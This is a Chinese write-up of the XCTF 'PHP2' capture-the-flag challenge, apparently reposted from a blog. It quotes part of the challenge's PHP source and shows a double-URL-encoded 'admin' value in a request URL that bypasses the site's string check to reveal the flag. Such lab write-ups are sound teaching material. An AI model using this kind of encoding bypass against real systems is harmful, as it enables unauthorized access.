XCTF：PHP2

时间：2020-10-18 16:45:10 阅读：32 评论：0 收藏：0 [点我收藏+]

标签：class mamicode log 访问者 decode 查看 exit 内容 min

phps文件就是php的源代码文件，通常用于提供给用户（访问者）查看php代码，因为用户无法直接通过Web浏览器看到php文件的内容，所以需要用phps文件代替。

首先访问 index.phps获得代码：

not allowed!

"); exit(); } $_GET[id] = urldecode($_GET[id]); if($_GET[id] == "admin") { echo "

Access granted!
"; echo "

Key: xxxxxxx
"; } ?> Can you anthenticate to this website?

代码审计得知要输入的id参数的值为url编码后的admin，考虑到浏览器会对admin进行一次url解码

所以这里我们要两次url编码

http://220.249.52.133:33961/index.php?id=%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65

得到flag：

技术图片

可进行字符URL编码网站：http://web.chacuo.net/charseturlencode

XCTF：PHP2

标签：class mamicode log 访问者 decode 查看 exit 内容 min

原文地址：https://www.cnblogs.com/luocodes/p/13828390.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行